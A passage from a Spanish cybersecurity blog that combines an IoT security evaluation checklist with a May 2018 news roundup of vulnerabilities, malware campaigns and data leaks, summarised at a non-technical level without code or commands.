aplicación móvil. ### Contexto de la ciberseguridad Existe la necesidad de garantizar que se establezcan las reglas y los marcos correctos para gobernar un mundo cada vez más digital. Para ello, debemos desarrollar una comprensión compartida de los derechos y responsabilidades de los ciudadanos y las empresas junto con un programa de trabajo para ponerlo en práctica. Debería ser un proceso de colaboración entre el gobierno, los ciudadanos, la industria, y el mundo académico para desarrollar e implementar un conjunto de principios que guíen nuestros comportamientos en la era digital. Este trabajo se basa en la orientación técnica existente para la industria, que incluye un conjunto de principios que describen un enfoque seguro por defecto en el contexto de la ciberseguridad . ## Recomendaciones de ciberseguridad en IoT Las conclusiones y recomendaciones no deben considerarse de manera aislada, sino como parte de un conjunto más amplio de actividades. ### Interfaz web insegura - Evalúa cualquier interfaz web para determinar si se permiten contraseñas débiles - Evaluar el mecanismo de bloqueo de cuenta - Evalúa la interfaz web sobre vulnerabilidades XSS, SQLi y CSRF y otras vulnerabilidades de aplicaciones web - Evaluar el uso de HTTPS para proteger la información transmitida - Evaluar la capacidad de cambiar el nombre de usuario y la contraseña - Determinar si los firewalls de las aplicaciones web se utilizan para proteger las interfaces web ### Autenticación / Autorización insuficiente - Evaluar la solución para el uso de contraseñas seguras donde se necesita autenticación - Evaluar la solución para entornos multiusuario - Evaluar la solución para la autenticación de dos factores de implementación cuando sea posible - Evaluar mecanismos de recuperación de contraseña - Evalúa la solución para las contraseñas seguras - Evalúe la solución para la opción de forzar la caducidad de la contraseña después de un período específico - Evaluar la solución para el nombre de usuario y la contraseña predeterminados ### Servicios de red inseguros - Evaluar la solución para garantizar que los servicios de red no respondan mal a los ataques de desbordamiento de búfer, fuzzing o denegación de servicio - Evaluar la solución para asegurarse de que los puertos de prueba estén presentes ### Falta de encriptación - Evaluar la solución para determinar el uso de la comunicación cifrada entre dispositivos e Internet - Evaluar la solución para determinar si las prácticas de cifrado se utilizan y si se evitan los protocolos de propiedad - Evaluar la solución para determinar si una opción de firewall está disponible ### Preocupaciones de privacidad - Evaluar la solución para determinar la cantidad de información personal recopilada - Evaluar la solución para determinar si los datos personales recopilados están debidamente protegidos - Evaluar la solución para determinar si los datos de aseguramiento se desidentifican o se anonimizan - Evaluar la solución para garantizar que los usuarios finales tengan la opción de recopilar datos más allá de lo necesario para el funcionamiento correcto del dispositivo ### Interfaz Cloud insegura - Evaluar las interfaces Cloud sobre vulnerabilidades de seguridad (por ejemplo, interfaces API e interfaces web basadas en cloud) - Evaluar la interfaz web cloud para garantizar que no se permiten contraseñas débiles - Evaluar la interfaz web Cloud para garantizar un mecanismo de bloqueo de cuenta - Evaluar la interfaz web basada en cloud para determinar si se utiliza la autenticación de dos factores - Evaluar cualquier interfaz cloud para las vulnerabilidades XSS, SQLi y CSRF y otras vulnerabilidades - Evaluar todas las interfaces cloud para garantizar que se utiliza el transporte cifrado - Evaluar las interfaces cloud para determinar si la opción es fuerte - Evaluar las interfaces cloud para determinar si la opción para forzar la caducidad de la contraseña después de un período específico está disponible - Evaluar las interfaces cloud para determinar si el nombre de usuario y la contraseña predeterminados están disponibles ### Interfaz móvil insegura - Evaluar la interfaz móvil para asegurar que no permite contraseñas débiles - Evaluar la interfaz móvil sobre el mecanismo de bloqueo de cuenta - Evaluar la interfaz móvil para determinar si implementa la autenticación de dos factores (por ejemplo, Touch ID de Apple) - Evaluar la interfaz móvil para determinar si usa cifrado de transporte - Evaluar la interfaz móvil para determinar si la opción de requerir contraseñas seguras está disponible - Evaluar la interfaz móvil para determinar si la opción para forzar la caducidad de la contraseña después de un período específico está disponible - Evaluar la interfaz móvil para determinar si el nombre de usuario y la contraseña predeterminados están disponibles - Evaluar la interfaz móvil para determinar la cantidad de información personal recopilada ### Insuficiente configurabilidad de seguridad - Evaluar la solución para determinar si las opciones de seguridad de contraseñas (por ejemplo, Habilitar contraseñas de 20 caracteres o habilitar la autenticación de dos factores) están disponibles - Evaluar la solución para determinar si las opciones de encriptación (por ejemplo, Habilitación de AES-256 donde AES-128 es la configuración predeterminada) están disponibles - Evaluar la solución para determinar si los eventos de seguridad están disponibles - Evaluar la solución para determinar si las alertas y las notificaciones están disponibles ### Software / Firmware inseguro - Evaluar el dispositivo para asegurarse de que ha descubierto - Evaluar el dispositivo para asegurarse de que utiliza archivos de actualización encriptados y que los archivos se transmiten mediante cifrado - Evaluar el dispositivo para garantizar que los archivos firmados y luego valida ese archivo antes de la instalación ### Mala seguridad física - Evaluar el dispositivo para asegurarnos de que utiliza una cantidad mínima de puertos físicos externos (por ejemplo, puertos USB) en el dispositivo - Evaluar el dispositivo para determinar si se puede acceder a él a través de métodos no intencionados, como un puerto USB innecesario - Evaluar el dispositivo para permitir la desactivación de los puertos físicos no utilizados, como USB - Evaluar el dispositivo para limitar la capacidad de limitar ### Recomendaciones para todas las interfaces de usuario - Garantiza que las cuentas de usuario válidas no puedan ser identificadas por mensajes de error - Garantizar que las contraseñas seguras son requeridas por los usuarios Implementando el bloqueo de la cuenta después de 3-5 intentos fallidos de inicio de sesión ## Conclusiones A pesar de una corriente casi constante de informes de los medios de ciberataques e incidentes de piratería, todavía hay muchos dispositivos que no utilizan comunicaciones cifradas o autenticación adecuada. Es fundamental que los dispositivos domésticos inteligentes, o cualquier dispositivo IoT para el caso, utilicen la autenticación y el cifrado mutuo. Los dispositivos IoT a menudo tienen menos memoria y CPU más lentas, por lo que es posible que no utilicen los mismos métodos de encriptación que una computadora tradicional, pero eso no es excusa para una encriptación fuerte. Existen métodos criptográficos eficientes diseñados para dispositivos a pequeña escala, como la criptografía de curva elíptica (ECC), que se puede utilizar. Conceptos como las raíces de la confianza y el inicio seguro son importantes para garantizar la integridad del dispositivo. Cualquier código que se ejecute en un dispositivo inteligente, ya sea el firmware o la aplicación, se debe verificar a través de una cadena de confianza. Proteger el código y asegurar el dispositivo crea una línea de base fiable. Los proveedores deben proporcionar una forma simple y automática para que los usuarios actualicen sus dispositivos a fin de garantizar que los problemas de seguridad comunes puedan solucionarse de manera rápida y eficiente. Los dispositivos IoT solo deben aceptar firmware firmado como estándar. Cuando corresponda, las funciones de análisis de seguridad se deben proporcionar a la estrategia general de administración del dispositivo. Las interfaces de control de la nube presentan otro punto débil de muchas IoT. Los usuarios no deberían ser forzados a usar configuraciones cloud si todo lo que quieren es hacer tareas básicas como encender luces en sus casas. Los vendedores deben permitir el uso de contraseñas fuertes y complejas. Restringir la autenticación a códigos PIN de cuatro dígitos simples no protege suficientemente el dispositivo, especialmente si este problema se combina con la falta de cualquier mecanismo de protección de fuerza bruta. Incluso cuando se usan contraseñas seguras, encontramos vulnerabilidades de aplicaciones web comunes, como la inyección SQL o la inclusión remota de archivos. Los proveedores deben asegurarse de que sus servicios no sean vulnerables a las principales vulnerabilidades de las aplicaciones web de OWASP. Para los dispositivos de IoT, también es crucial que el proveedor haya sido considerado como lo que es cuando se produce un corte de energía o una red. ¿Se notificará al usuario o el dispositivo de seguridad que no funciona bien o pasará desapercibido? En un futuro cercano, mucha gente podría haberse conectado a nuestras redes domésticas. Esto conducirá a Smart Hub inteligentes que permiten comandos basados en condiciones lógicas, como "si esto, luego eso" como podemos ver en IFTTT, del cual soy super fan. Esto agrega complejidad al problema, ya que un problema en un dispositivo puede desencadenar el cierre de otro. Ya hay aplicaciones disponibles que permiten hacer exactamente esto. Para realizar las acciones, la aplicación necesita acceder a los dispositivos inteligentes. Esto hace que el concentrador inteligente sea un punto central de ataque ideal, cambiando como un efecto catastrófico en todos los dispositivos conectados a la red. Con todos estos problemas que afectan a los dispositivos en diferentes niveles, no es fácil implementar múltiples dispositivos inteligentes de manera segura en el hogar. Afortunadamente, hay formas de mejorar la seguridad general, como hemos destacado anteriormente. Esperamos que la seguridad de los dispositivos inteligentes aumente en un futuro cercano, permitiendo que cualquiera pueda usar esta tecnología para automatizar tareas. --- # Lo más relevante en Ciberseguridad este Mayo '18 URL: https://ciberseguridad.blog/lo-mas-relevante-en-ciberseguridad-este-mayo-18/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-05-25 Actualizado: 2026-10-04 Tema: Noticias Seguridad > Las noticias de Ciberseguridad más relevantes de Mayo de 2018. Vulnerabilidades, Fugas de Datos, Ciberguerra y mucho más. ! INFÓRMATE ¡ ## Vulnerabilidades - Vulnerabilidad de ejecución de código remoto en Windows : Se ha detectado una nueva vulnerabilidad de ejecución remota de código desencadenada por un fallo en Windows Host Computer Service Shim (hcsshim). El fallo tiene lugar cuando una librería no consigue validar las entradas que recibe al importar una imagen. Los atacantes pueden manipular la imagen para inyectar código malicioso una vez que esta llega al Shim. Una vez logrado esto, el atacante tendría acceso al host del sistema operativo. - Múltiples vulnerabilidades en productos CISCO: CISCO ha publicado actualizaciones para abordar vulnerabilidades críticas y altas en varios de sus productos: CVE-2018-0253 y CVE-2018-0258 (CVSSv3 9.8), CVE-2018-0264 (CVSSv3 9.6), CVE-2018-0262 (CVSSv3 8.8), CVE-2018-0234 y CVE-2018-0252 (CVSSv3 8.6), CVE-2018-0226 (CVSSv3 7.5), CVE-2018-0235 (CVSSv3 7.4). Las vulnerabilidades con mayor criticidad son, por tendencia general, de inyección de código malicioso. - Nuevo caso Spectre: En las últimas horas se han dado a conocer hasta ocho nuevas vulnerabilidades que afectan a los procesadores Intel y que serán parcheadas en los próximos días. Las vulnerabilidades tienen características parecidas a las de Spectre y Meltdown, que fueron reportadas y parcheadas en enero. Ahora, un investigador de seguridad ha logrado explotar las nuevas vulnerabilidades para eludir las protecciones de los parches. Por su relación con Spectre, este nuevo conjunto de fallos se ha denominado Spectre NG (New Generation). - Boletín de seguridad de Microsoft: Microsoft ha lanzado actualizaciones para abordar vulnerabilidades en Internet Explorer, Microsoft Edge, Microsoft Windows, Microsoft Office Office Services y Web Apps, ChakraCore, Adobe Flash Player, .NET Framework, Servidor Microsoft Exchange y Windows Host Compute Service Shim. Dieciocho de estas vulnerabilidades han sido catalogadas como críticas y cuarenta y cuatro como importantes. - 0-day en Office365: Se ha publicado una vulnerabilidad a través de la cual un atacante podría construir un correo electrónico con URL maliciosas sin que sean detectadas y bloqueadas por Office365. Esto se debe a que la herramienta de Microsoft no es capaz de analizar URL divididas en una base y una parte extra de modo que solo analiza la base. - Vulnerabilidad de ejecución de código en Adobe Flash: Se ha detectado una vulnerabilidad en Adoble Flash Player que permite la ejecución arbitraria de código que permitiría, a su vez, instalar programas, acceder y modificar datos, y crear nuevas cuentas con privilegios de administrador. Actualmente no se han detectado campañas activas de explotación de esta vulnerabilidad. - Fallo de seguridad de Windows en explotación: Como parte del boletín de actualizaciones mensual, Microsoft lanzó ayer un parche para solucionar una vulnerabilidad crítica en el motor VBScript de Windows que permitía a un atacante comprometer máquinas con SO Windows a través de Internet Explorer. La explotación de esta vulnerabilidad, CVE-2018-8174, a través del ataque denominado Double Kill podría estar siendo activamente explotada por agentes amenaza desde abril. - Sacando credenciales de Windows con un "Bad PDF": Se ha publicado un artículo que detalla la explotación de una vulnerabilidad crítica en Adobe, publicada por CheckPoint a finales de abril, para conseguir las credenciales NTLM de Windows de cualquier usuario a través de un PDF específicamente modificado. Esta vulnerabilidad no tiene asignado un CVE, pues Adobe ha anunciado que no van a trabajar en resolver esta vulnerabilidad porque Windows ya proporciona un parche de seguridad opcional que proporciona al usuario la posibilidad de deshabilitar la autenticación por NTLM. - Parches de mitigación para Meltdown en Android: Como parte de su boletín mensual de mayo, Google ha publicado parches de mitigación para la vulnerabilidad Meltdown que afectaría a los dispositivos Android. Estos parches serían una medida seguridad adicional, complementaria con los primeros parches publicados por la compañía después de que Meltdown y Spectre salieran a la luz en enero de 2018. - **Ejecución remota de código en Smartphones LG **: La compañía LG ha parcheado dos vulnerabilidades graves que habían sido detectadas en los teclados de la mayoría de sus dispositivos smartphone. El fallo se hallaba a la hora de configurar un nuevo lenguaje en un dispositivo, ya que éste necesitaba descargar una librería concreta de un servidor y esta descarga se realizaba a través de un protocolo HTTP. Esto permitiría a un atacante interceptar la descarga y sustituirla por un archivo malicioso. - Una interpretación errónea desencadenó las últimas vulnerabilidades de Intel: Las autoridades estadounidenses del CERT/CC estarían barajando errores humanos como la causa de las últimas vulnerabilidades detectadas en los productos Intel. Al parecer, el equipo de desarrolladores de la mayoría de los sistemas operativos no entendieron partes específicas de la documentación de Intel sobre los chips, lo que habría desencadenado la instalación de vulnerabilidades en sus productos. Estos fallos estarían relacionados con la CVE-2018-8897. - PoC para vulnerabilidad en Electron (CVE-2018-1000136): Se han hecho públicos los detalles de explotación de la vulnerabilidad de ejecución remota de código en Electron (CVE-2018-1000136) que se publicó el 21 de marzo. Para que la vulnerabilidad pueda explotarse mediante esta prueba de concepto, debe cumplirse que la opción nodeIntegration esté deshabilitada, se incluya alguna vulnerabilidad XSS en la aplicación, y que tenga una configuración específica en varias opciones. **Exploit para la vulnerabilidad Drupalgeddon2 (CVE-2018-7600): Se ha integrado en Metasploit el exploit, publicado en Github el 13 de abril, para la vulnerabilidad Drupalgeddon2 (CVE-2018-7600) del 28 de marzo. La vulnerabilidad afecta a las versiones de Drupal anteriores a 7.58, 8.x anteriores a 8.3.9, 8.4.x anteriores a 8.4.6 y 8.5.x anteriores a 8.5.1. Está catalogada con una severidad crítica contando con un CVSSv3 de 9.8 - Debilidades en el sistema de autenticación portugués: Se han descubierto varias vulnerabilidades en el sistema de autenticación proporcionado por parte del gobierno de Portugal para la administración de aplicaciones en las redes públicas. Al parecer, si un atacante quisiera explotar varias de estas vulnerabilidades, solo necesitaría 30 minutos. Además, las aplicaciones desarrolladas por los servicios públicos almacenan, con toda probabilidad, numerosa información personal que podría verse vulnerada. - Comandos ocultos en Alexa, Google y Siri: Un grupo de investigadores ha descubierto un fallo en los asistentes de voz Alexa, Siri y Google Assistant que permite enviarles comandos a través de sonidos de baja frecuencia. Estos comandos son inaudibles para el oído humano, pero pueden esconderse en “ruido blanco”, música o ultrasonidos para solicitar a los asistentes que realicen tareas, lo que abre la puerta a nuevos vectores de ataque. - Vulnerabilidad crítica en el cliente DHCP incluido RHEL 6 y 7: Se ha detectado una vulnerabilidad de tipo inyección de órdenes en el cliente DHCP (paquete dhclient) incluido en las distribuciones Red Hat Enterprise Linux 6 y 7. La vulnerabilidad ha sido catalogada como crítica. Un servidor DHCP malicioso podría usar esta vulnerabilidad para conseguir la ejecución de órdenes arbitrarias con privilegios de root en los clientes afectados. Los clientes deberían estar usando NetworkManager configurado para usar DHCP como método de configuración de red. NetworkManager tiene un script que se ejecuta cada vez que se recibe una respuesta DHCP de un servidor DHCP. Lo que se consigue con esta vulnerabilidad es que el cliente ejecute cualquier cosa que desee el servidor. - Historia de dos 0-Days: Gracias a una muestra encontrada en un pdf malicioso, los investigadores de ESET han sido capaces de identificar exploits para dos vulnerabilidades desconocidas hasta ahora. Estas se tratarían de un fallo de ejecución de código en remoto que afecta a Adobe Reader y de un fallo de escalado de privilegios en Microsoft Windows. El uso de estas vulnerabilidades en un solo documento la convierte en una amenaza considerable, ya que la interacción con el usuario se reduciría al mínimo. Se sospecha que este ataque puede ser obra de alguna APT. - Boletín de seguridad de CISCO: Cisco ha lanzado actualizaciones para abordar vulnerabilidades que afectan a múltiples productos: CVE-2018-0222 (CVSSv3 10): vulnerabilidad de credenciales estáticas en el Centro de Arquitectura de Digital Network; CVE-2018-0271 (CVSSv3 10): vulnerabilidad de evasión de autenticación del Centro de arquitectura de Digital Network; CVE-2018-0268 (CVSSv3 10): vulnerabilidad de acceso no autorizado en el Centro de Arquitectura de Digital Network; CVE-2018-0277 (CVSSv3 8.6): vulnerabilidad de denegación de servicio del certificado TLS de Identity Services Engine EAP; CVE-2018-0270 (CVSSv3 8.1): vulnerabilidad de CSRF en IoT Field Network Director; CVE-2018-0280 (CVSSv3 7.5): vulnerabilidad de denegación de servicio en los servicios de Meeting Server Media; CVE-2018-0279 (CVSSv3 6.3): vulnerabilidad de acceso al Shell de Linux del software de la infraestructura Enterprise NFV. - **Vulnerabilidades en sistemas corporativos **: La empresa Synopsys ha publicado un informe sobre el estado de la seguridad de los programas de código libre y cómo afecta a las empresas. Este informe hace especial hincapié en que la alerta y la concienciación por las vulnerabilidades críticas ha crecido en las empresas, pero que ésta no va acompañada de esfuerzos reales para parchear los sistemas. Según Synopsys, algunas de las vulnerabilidades que más daño hicieron al entorno corporativo durante el último año se conocían desde años atrás. - Análisis y PoC de CVE-2018-8120 (0-day): Se ha publicado un análisis y un PoC de la vulnerabilidades CVE-2018-8120, que formaba parte del boletín de mayo (publicado el 8 de mayo de 2018). Esta vulnerabilidad es un fallo de elevación de privilegios. Un atacante que consiguiera explotarla podría conseguir ejecutar código de su elección en modo privilegiado. Para la explotación de esta vulnerabilidad, el atacante debe poder loguearse previamente en el sistema. La vulnerabilidad afecta a Windows Server 2008 y Windows 7. La PoC es sólo para Windows 7. - Controversia por fallo en Keeper: La investigación de un especialista de seguridad sobre un fallo en el gestor de contraseñas Keeper ha derivado en un problema para la compañía desarrolladora. Esto se debe a que la compañía detrás de Keeper siempre ha asegurado que no guarda ningún tipo de información relativa a las contraseñas de los usuarios. Sin embargo, la investigación ha revelado que cualquier usuario con que controle el servidor de la API de Keeper puede lograr acceder a la clave de descifrado que funciona para todas las contraseñas de los usuarios. - Fallo grave en Signal: La aplicación de escritorio de Signal, aplicación de mensajería popular por su cifrado end-to-end, ha tenido que ser parcheada de nuevo tras detectarse una vulnerabilidad crítica de inyección de código (CVE-2018-11101). La vulnerabilidad podía explotarse al enviar un mensaje con código malicioso a la aplicación de escritorio de Signal con el simple envío de un mensaje, por lo que no requería de la interacción del usuario. Gracias a este fallo, un atacante podría acceder a las conversaciones almacenadas en texto plano. - Fallo en sistemas de alarma interconectados:Un grupo de investigadores ha logrado acceder al backend de un popular sistema de vehículos conectados a internet. Se desconoce si este fallo ha sido ya explotado por algún atacante, pero de haberlo hecho, éste podría haber logrado extraer la geolocalización de los vehículos, así como información de usuario. También es posible que este fallo permita acceder y manipular el motor de los automóviles. - Ataques sobre vulnerabilidad 0-Day en routerse DrayTek: La empresa taiwanesa fabricante de routers y otros equipos DrayTrek ha anunciado que se ha detectado una vulnerabilidad 0-Day en una de sus series de routers que estaría siendo explotada activamente. Al parecer, varios usuarios se han quejado de que alguien habría cambiado la configuración DNS de sus routers para dirigirla a un servidor determinado. El ataque se estaría realizando mediante uso de un exploit y no a través de la obtención de contraseñas por defecto, como se especulaba inicialmente. - Exploit para la vulnerabilidad crítica en Internet Explorer (CVE-2018-8174): Se ha detectado un exploit para la vulnerabilidad crítica en el motor VBScript de Windows (CVE-2018-8174), corregida en el boletín de seguridad de Microsoft de mayo de 2018, que permitía a un atacante comprometer máquinas con SO Windows a través de Internet Explorer. Por otro lado, se ha creado un módulo en Metasploit que permite crear documentos Word que lanzan el exploit para esta vulnerabilidad de Internet Explorer desde un documento de Word. - BMW arregla fallo de seguridad grave en sus coches: BMW está trabajando en unas actualizaciones de firmware después de que un grupo de investigadores descubriera 14 fallos distintos en varios modelos de coches fabricados desde 2012 hasta la actualidad. Estos fallos se hallan en los componentes informáticos de los vehículos, específicamente en los sistemas de comunicación móvil o la telemetría. Los fallos han permitido a los investigadores escalar a través de los distintos sistemas del vehículo, incluidos aquellos que no constaban de vulnerabilidades originalmente. - 100 millones de dispositivos IoT expuestos:Un grupo de investigadores ha demostrado que el protocolo de comunicación Z-Wave Wireless, presente en más de 100 millones de dispositivos IoT, es vulnerable a ciberataques. En teoría, un atacante que se encuentre en el radio de acción de los dispositivos puede interceptar la comunicación entre los dispositivos para romper sus sistemas de seguridad e intervenir los datos. - Vulnerabilidad en Fortinet FortiOS (CVE-2017-14187):Se ha publicado una vulnerabilidad de escalada de privilegios y ejecución de código en local en las versiones de Fortinet FortiOS 5.6.0 hasta 5.6.2, 5.4.0 hasta 5.4.8, y versiones 5.2 y posteriores. Esta vulnerabilidad permitiría a un atacante ejecutar un programa binario no autorizado contenido en un dispositivo USB conectado a un FortiGate y vinculando dicho programa binario a un comando que puede ejecutar el comando fnsysctl CLI. - Vulnerabilidades en sector energético:Un investigador de Letonia ha descubierto una serie de vulnerabilidades en los productos Telem fabricados por la compañía estonia Martem. Este descubrimiento es importante ya que estos dispositivos se usan principalmente en plantas de generación de energía y la explotación de las vulnerabilidades permitiría realizar ejecuciones de código arbitrario y denegaciones de servicio (DoS). Los principales países afectados son las repúblicas bálticas y Finlandia. - Puertas traseras en routers D-Link:Kaspersky ha publicado un análisis en el que detalla el descubrimiento de varias vulnerabilidades y cuentas de usuario instaladas por defecto en el firmware de los routers D-Link DIR-620. Al parecer, este tipo de routers son frecuentemente distribuidos por ISPs en Rusia, el este de Europa y Reino Unido. Las cuentas de usuario por defecto pueden ser explotadas por un ataque sin autenticación para obtener privilegios de acceso al firmware y obtener datos sensibles como contraseñas en texto plano. ## Malware - Primer ransomware con Process Doppelgänging: Kaspersky Lab ha detectado el primer ransomware, variante de SynAck, que utiliza Process Doppelgänging (técnica de inyección de código sin archivos) para evadir su sistema de detección y tiene como objetivo usuarios de Estados Unidos, Kuwait, Alemania e Irán principalmente. El ataque funciona mediante transacciones NTFS iniciando con ellas, un proceso malicioso que reemplaza la memoria de un proceso legítimo. Para identificar el país de un usuario específico, compara los diseños de teclado instalados en el objetivo. Si encuentra una coincidencia (Rusia, Bielorrusia, Ucrania, Georgia, Tayikistán, Kazajistán y Uzbekistán), el ransomware duerme 30 segundos y llama a ExitProcess para evitar el cifrado de los archivos. En caso contrario, SynAck cifra el contenido de cada archivo con el algoritmo AES-256-ECB. - Reaparición del ransomware PSCrypt: Se ha detectado una nueva campaña de utilización del ransomware PSCrypt, un malware detectado a finales de 2017 que afectaba principalmente a organizaciones en Ucrania. El malware, además, está basado en el ransomware GlobeImposter. - La botnet "Hide & Seek" sobrevive al reinicio del sistema: Los investigadores de ciberseguridad han detectado una variante de la botnet Hide & Seek, que afecta mayoritariamente a dispositivos IoT, que es capaz de permanecer en los sistemas incluso después de que estos se hayan reiniciado o restaurado. Hasta ahora, bastaba con restaurar o resetear los dispositivos para que éstos dejaran de ser parte de la botnet, pero Hide & Seek es capaz de copiar los ficheros maliciosos en el menú del dispositivo, por lo que seguirá presente en el sistema. - Actualización sobre el ransomware GrandCrab: La unidad Talos de Cisco ha publicado un nuevo artículo actualizando la información disponible sobre las últimas campañas de infección con el ransomware GrandCrab. Éstas han estado basadas en la difusión del malware a través de spam malicioso que asemejaba confirmaciones de envíos y facturas falsas. Este spam redirigía a su vez a webs comprometidas. - ALLANITE: Dragos dio a conocer en el de ayer una campaña de ataques denominada ALLANITE que estaría dirigida a las redes de control industrial del sector de distribución eléctrica de EE.UU. y Reino Unido. El objetivo de los operadores de ALLANITE es el de realizar reconocimientos de sistemas y obtener información. Se sospecha que la explotación de ALLANITE comenzó en mayo de 2017 y podría estar relacionado con la APT Dragonfly. - Filtrado el código del malware TreasureHunter: El código fuente del malware destinado a puntos de venta TreasureHunter ha sido detectado en un foro en lengua rusa. El post que incluye el código fue publicado en marzo y permite que cualquier usuario con acceso a la publicación pueda utilizar este malware. Se espera que se de un repunte de detecciones de este malware al igual que ya sucediera con la filtración de otros malware como Zeus, Mirai o Alina. - El malware Panda ataca redes sociales y portales de criptomoneda:El malware Panda, una poderosa variante del popular troyano bancario Zeus, habría sido usado para atacar portales de intercambio de criptomoneda y redes sociales en sus últimas campañas detectadas entre febrero y mayo de 2018. Estas últimas campañas se han dirigido, además, al sistema financiero japonés, estadounidense, italiano y de varios países latinoamericanos. - Malware en la tienda online de Ubuntu: Se han descubierto dos paquetes instalación maliciosos en la tienda online de Ubuntu subidos por un usuario cuya cuenta se halla ya intervenida. Al parecer, el usuario habría cargado los paquetes 2048buntu y Hextris, los cuales contendrían malware para minar criptomoneda oculto en su código fuente. - Ataques al sector del marketing: Vega Stealer: Se ha detectado una nueva variante de ransomware denominada Vega Stealer que estaría dirigida al sector del marketing, las relaciones públicas y las industrias de fabricación y retail. Vega Stealer se trataría de una variante de August Stealer que buscaría obtener las credenciales e información bancaria almacenada en los navegadores Chrome y Firefox. - STALINLOCKER: El nuevo malware que borra los equipos en 10 minutos: StalinLocker es un malware también conocido como StalinScreamer. La peligrosidad reside en que es capaz de vaciar un equipo en apenas 10 minutos. Este es el tiempo que da para que la víctima ingrese un código que evite el borrado. Es decir, cobra por ese dinero a cambio de no formatear el equipo. No afecta únicamente al disco duro principal, sino a todas las unidades conectadas a ese sistema. Analiza todas las unidades y las borra. Mientras se ejecuta este malware, muestra una imagen de Stalin, así como reproduce el himno de la Unión Soviética, con una cuenta atrás. Una vez pasa ese tiempo marcado, comienza el borrado de archivos. - Campaña de minado afecta a 500.000 usuarios en tres días:Se ha detectado una campaña de infección masiva de malware que busca difundir un nuevo tiempo de minero de criptomoneda. La nueva variante del malware se denomina WinstarNssmMiner y afecta principalmente a sistemas Windows. WinstarNssmMiner está basado en la aplicación de minado de monero XMRig y tiene capacidades para desactivar las protecciones de determinados tipos de antivirus. - Powershell maliciosa ataca a clientes de bancos británicos: Se ha detectado el uso de un script PowerShell cuyo objetivo parece ser los clientes de los principales bancos de Reino Unido. Entre sus funciones, el script está diseñado para hacer capturas de pantalla, descargar payloads maliciosos y capturar listas de los resolver DNS almacenados en el cache de los usuarios. - Turla Mosquito: La conocida APT Turla, grupo cibercriminal especializado en espionaje, habría iniciado una campaña denominada Mosquito en marzo de 2018. Esta campaña estaría utilizando Metasploits disponibles en fuentes abiertas para lograr acceder a los dispositivos y poder instalar la puerta trasera mosquito. - Malware en 141 modelos de móviles de bajo coste: Avast ha publicado un listado de 141 modelos de móviles de bajo coste en los que se ha detectado malware. Entre ellos, están ZTE, Archos, y myPhone. Es posible que haya más modelos afectados ya que existen muchas variantes de algunos de los modelos listados, algunos con nombre similares. El único patrón común que se ha detectado es que tienen un chipset Mediatek, aunque no se estima que esto sea relevante para el ataque que ya ha afectado a más de 100 países. - VPNFilter, campaña de tipo APT gubernamental: Esta campaña probablemente esté dirigida contra Ucrania para la infección de dispositivos domésticos (de red y almacenamiento) empleando vulnerabilidades que disponen de exploits públicos. Hasta el momento, se han comprometido más de 500.000 dispositivos en 54 países. El APT cuenta con capacidades de control de dispositivo, interceptación de tráfico (robo de credenciales y tráfico Modbus SCADA) e inutilización del dispositivo; además de contar con capacidades avanzadas de persistencia, ofuscación y modularidad. [Imagen: vpnfilte] ## Fugas - GitHub almacenó contraseñas en texto plano en sus logs: GitHub ha alertado a sus usuarios acerca de la detección de un fallo en la función “reestablecer contraseña” que ha provocado que sus contraseñas de acceso a la plataforma se hayan almacenado en texto plano en los logs internos de la compañía. Desde GitHub han asegurado que estas contraseñas se han visto expuestas a un número muy reducido de empleados de la compañía - Fuga masiva de datos en el banco más grande de Australia: El Commonwealth Bank australiano fue víctima de la fuga de los historiales financieros de más de 12 millones de clientes y no lo ha comunicado en tiempo y forma. Al parecer, los datos perdidos pertenecen al periodo 2004-2014 y fueron extraviados por una empresa colaboradora del banco, Fuji Xerox en 2016. Tras el incidente, el banco alerto a la comisión del mercado correspondiente, pero decidió no avisar a sus clientes. - Uso de la vulnerabilidad Krack contra la industria médica: En los últimos días se ha descubierto que varios productos de la compañía de diseño de equipo médico Becton, Dickinson & Company son vulnerables al ataque de reinstalación de claves KRACK, lo que permitiría a un atacante penetrar, cambiar y extraer información de los historiales médicos de los pacientes. Pese a que KRACK lleva varios meses en el dominio público, no se han detectado ataques concretos contra esta serie de equipos médicos. - Fallo de seguridad en Twitter expone contraseñas de usuarios: Twitter publicó ayer un tweet a través de su cuenta oficial de soporte en la que afirmaba que habían descubierto un error en sus sistemas que almacenaba las contraseñas en texto plano en un registro interno. Según la red social, el error ha sido solucionado y no se tiene constancia de un mal uso de estas contraseñas. Aun así, como precaución, recomiendan que todos sus usuarios modifiquen sus contraseñas. - Explotación de fallo WebLogic: Se ha publicado un análisis de la explotación de la vulnerabilidad CVE-2018-2628 que afecta a WebLogic de Oracle. Según el análisis, se han detectado cerca de 450 casos de ataques que han utilizado esta vulnerabilidad en las 48 horas posteriores a que se publicara el parche para mitigar el fallo y 24 horas después de que apareciera una prueba de concepto en GitHub. El objetivo de estos ataques fue, principalmente, el minado de criptomoneda. - Difusión de la herramienta RAT Remcos : El equipo de análisis de Fortiguard ha analizado muestras de malware detectados de forma reciente y ha identificado una campaña de explotación de la vulnerabilidad de Microsoft Office CVE-2017-11882 que se estaría difundiendo con ayuda de una nueva versión de la herramienta de acceso remoto Remcos. Esta campaña se habría iniciado a principios de abril y se aprovecha de aquel software no actualizado cuando se parcheó la vulnerabilidad en noviembre de 2017. - Vulnerabilidad en IBM WebSphere (CVE-2017-1743) : Se ha publicado una vulnerabilidad en IBM WebSphere Application Server 7.0, 8.0, 8.5 y 9.0 que permitiría que un atacante remoto obtenga información confidencial causada por un manejo inadecuado de los campos del panel de la consola administrativa. Cuando se explota, un atacante podría navegar por el sistema de archivos. - Guerra de ciberataques entre Turquía y Grecia : Los conflictos tradicionales entre los gobiernos de Grecia y Turquía se han desplazado ahora al ámbito de la ciberguerra. Durante los últimos días, las autoridades de ambos países han confirmado y desmentido una serie de ataques sufridos a manos de grupos como Akincilar cuyos objetivos son, por el momento, agencias gubernamentales, medios de comunicación y empresas de telecomunicaciones. Se sospecha que este aumento de ciberataques fue iniciado desde Grecia con motivo de las próximas elecciones en Turquía. - App de Android deja al descubierto fotos y mensajes de audio: Los usuarios de la aplicación de Android Drupe han sido víctimas de una sobreexposición de su información en un servidor alojado en Amazon Web Services. La escasa protección de este servidor dejaba al descubierto fotos de perfil, mensajes de audio y otra información procedente de otras redes sociales como Skype o WhatsApp. - Un "grave" fallo en la web del CGPJ deja al descubierto datos personales de sentencias: El Consejo General del Poder Judicial ha sido alertado de un fallo grave en su página web que permitía a cualquier usuario tener acceso a sugerencias automáticas para autocompletar campos a la hora de realizar 